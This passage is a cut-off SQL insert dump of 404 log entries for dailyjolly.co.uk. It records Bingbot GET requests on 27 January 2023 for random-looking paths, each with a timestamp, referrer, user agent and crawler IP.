09:38:32','/1q49qi2e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37254,'2023-01-27 09:38:33','/dozw5njd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37255,'2023-01-27 09:38:33','/trjgigjg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37256,'2023-01-27 09:38:34','/i25j1rve2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37257,'2023-01-27 09:38:34','/providential/a8hsthce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37258,'2023-01-27 09:38:35','/i2y82yee2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37259,'2023-01-27 09:38:35','/bewet1/9o7ektae2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37260,'2023-01-27 09:38:36','/iedao1ke2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37261,'2023-01-27 09:38:37','/iexk8vxe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37262,'2023-01-27 09:38:37','/paginate/wnejnlkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37263,'2023-01-27 09:38:38','/tzdopwhe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37264,'2023-01-27 09:38:38','/offension/wfioil3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37265,'2023-01-27 09:38:39','/iswhizje2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37266,'2023-01-27 09:38:39','/isy1at1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37267,'2023-01-27 09:38:40','/iwrnxg6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37268,'2023-01-27 09:38:41','/tzv8hv3f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37269,'2023-01-27 09:38:41','/inc/kyvifkne2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37270,'2023-01-27 09:38:42','/barded6/ieiboy0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37271,'2023-01-27 09:38:42','/w154wmuf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37272,'2023-01-27 09:38:43','/w1gj4yof2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37273,'2023-01-27 09:38:44','/bacteriolysis/to7udekd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37274,'2023-01-27 09:38:44','/body/tf4nbqtf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37275,'2023-01-27 09:38:45','/notes/lim-bGltYW/223lowin','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37276,'2023-01-27 09:38:45','/k87f7nwg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37277,'2023-01-27 09:38:46','/k8sp112e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37278,'2023-01-27 09:38:46','/kezixw1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37279,'2023-01-27 09:38:47','/mollissima/kakkka4f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37280,'2023-01-27 09:38:47','/exiguity/dsgettae2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37281,'2023-01-27 09:39:01','/kgxofbcf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37282,'2023-01-27 09:39:05','/au6mjeef2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37283,'2023-01-27 09:39:06','/ki91tf2g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37284,'2023-01-27 09:39:06','/aqwtmare2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37285,'2023-01-27 09:39:07','/wr2h7oxe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37286,'2023-01-27 09:39:08','/envoyship/dej4hvjd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37287,'2023-01-27 09:39:08','/tiaepf2g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37288,'2023-01-27 09:39:09','/kk8cg47e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37289,'2023-01-27 09:39:09','/standing/k22c01jd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37290,'2023-01-27 09:39:10','/amg7c7sf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37291,'2023-01-27 09:39:10','/ainhk50e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37292,'2023-01-27 09:39:11','/wt44whse2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37293,'2023-01-27 09:39:11','/ddkvd55e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37294,'2023-01-27 09:39:12','/wvmf3zte2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37295,'2023-01-27 09:39:12','/wjm4tyjf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37296,'2023-01-27 09:39:13','/spectroscopy/whepjm6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37297,'2023-01-27 09:39:14','/epigrammatic/iw9iirbg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37298,'2023-01-27 09:39:14','/aep5ifrf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37299,'2023-01-27 09:39:15','/aeopn0me2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37300,'2023-01-27 09:39:15','/slitted/a698wk1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37301,'2023-01-27 09:39:16','/a84w70vg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37302,'2023-01-27 09:39:16','/shotgun/9rw8icqg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37303,'2023-01-27 09:39:17','/wx9cxuoe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37304,'2023-01-27 09:39:17','/a623wnye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37305,'2023-01-27 09:39:18','/semiprecious/ismnxqde2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37306,'2023-01-27 09:39:18','/devanagari3/imdshvuf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37307,'2023-01-27 09:39:19','/scalloper30/wfufcl3f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37308,'2023-01-27 09:39:19','/a0sqynue2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37309,'2023-01-27 09:39:20','/9rk30kce2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37310,'2023-01-27 09:39:20','/scalding/tv6ktucf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37311,'2023-01-27 09:39:21','/ks2daoze2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37312,'2023-01-27 09:39:35','/92fwp3ee2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37313,'2023-01-27 09:39:36','/internship/iyemdvee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37314,'2023-01-27 09:39:36','/tfw45jng2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37315,'2023-01-27 09:39:37','/1pimj2vf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37316,'2023-01-27 09:39:37','/tkpf525e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37317,'2023-01-27 09:39:38','/1mz7ko6e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37318,'2023-01-27 09:39:38','/tnsgbz1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37319,'2023-01-27 09:39:39','/ti9ustmg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37320,'2023-01-27 09:39:39','/dojlgkpe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37321,'2023-01-27 09:39:39','/dot95vae2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37322,'2023-01-27 09:39:40','/1c5ttrvg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37323,'2023-01-27 09:39:40','/19t90qcf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37324,'2023-01-27 09:39:41','/dw7z757e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37325,'2023-01-27 09:39:41','/1193yn4g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37326,'2023-01-27 09:39:42','/i2ororre2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37327,'2023-01-27 09:39:42','/precontracting/kigbmhkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37328,'2023-01-27 09:39:42','/postlude/wxfwf7fg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37329,'2023-01-27 09:39:43','/i4qycasf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37330,'2023-01-27 09:39:43','/ie4zmljd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37331,'2023-01-27 09:39:43','/iep7wu1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37332,'2023-01-27 09:39:44','/im36tvgg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37333,'2023-01-27 09:39:44','/post/d2Fybwvy.html?war=de713','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37334,'2023-01-27 09:39:45','/placebo/d1ch6ckd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37335,'2023-01-27 09:39:45','/performing/whu0mutg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37336,'2023-01-27 09:39:46','/imlvh2uf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37337,'2023-01-27 09:39:46','/istkb41e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37338,'2023-01-27 09:39:46','/w17f7swf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37339,'2023-01-27 09:39:47','/bulker46/im43d3sg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37340,'2023-01-27 09:39:47','/body/93qw54jd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37341,'2023-01-27 09:39:48','/gilour1/aiezw65e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37342,'2023-01-27 09:40:06','/ka1b704g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37343,'2023-01-27 09:40:06','/kcldzh7f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37344,'2023-01-27 09:40:06','/fleshpot46/1hlqintg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37345,'2023-01-27 09:40:07','/another1/dikx693e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37346,'2023-01-27 09:40:07','/w7dostbg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37347,'2023-01-27 09:40:08','/ferulic4/aiswd3mg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37348,'2023-01-27 09:40:08','/neckband/dehnqbef2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 